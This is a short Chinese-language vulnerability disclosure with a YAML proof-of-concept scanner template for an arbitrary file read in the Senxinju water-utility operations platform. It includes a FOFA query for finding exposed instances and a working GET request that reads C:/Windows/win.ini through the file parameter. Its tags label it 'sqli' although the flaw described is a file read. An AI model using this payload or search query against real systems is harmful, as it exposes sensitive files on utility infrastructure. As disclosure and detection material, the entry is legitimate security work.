漏洞描述
森鑫炬水务企业综合运营平台 /Forms/Instance/Get 存在任意文件读取漏洞,攻击者可获取系统内部敏感文件内容,造成信息泄露。
fofa:title="森鑫炬水务企业综合运营平台 - S8" || (body="Content/easyui.css" && body="重庆森鑫炬科技有限公司")
shuiwu-formsinstanceget-sqli: 森鑫炬水务企业综合运营平台-FormsInstanceGet文件读取漏洞
PoC代码[已公开]
id: shuiwu-formsinstanceget-sqli
info:
name: 森鑫炬水务企业综合运营平台-FormsInstanceGet文件读取漏洞
author: avic123
severity: high
verified: true
description: |
森鑫炬水务企业综合运营平台 /Forms/Instance/Get 存在任意文件读取漏洞,攻击者可获取系统内部敏感文件内容,造成信息泄露。
fofa:title="森鑫炬水务企业综合运营平台 - S8" || (body="Content/easyui.css" && body="重庆森鑫炬科技有限公司")
reference:
- https://vip.bdziyi.com/58427/
tags: shuiwu,sqli
created: 2025/09/05
rules:
r0:
request:
method: GET
path: /Forms/Instance/Get?file=C:/Windows/win.ini
expression: |
response.status == 200 &&
response.body.bcontains(b'for 16-bit app support') &&
response.body.bcontains(b"[extensions]")
expression: r0()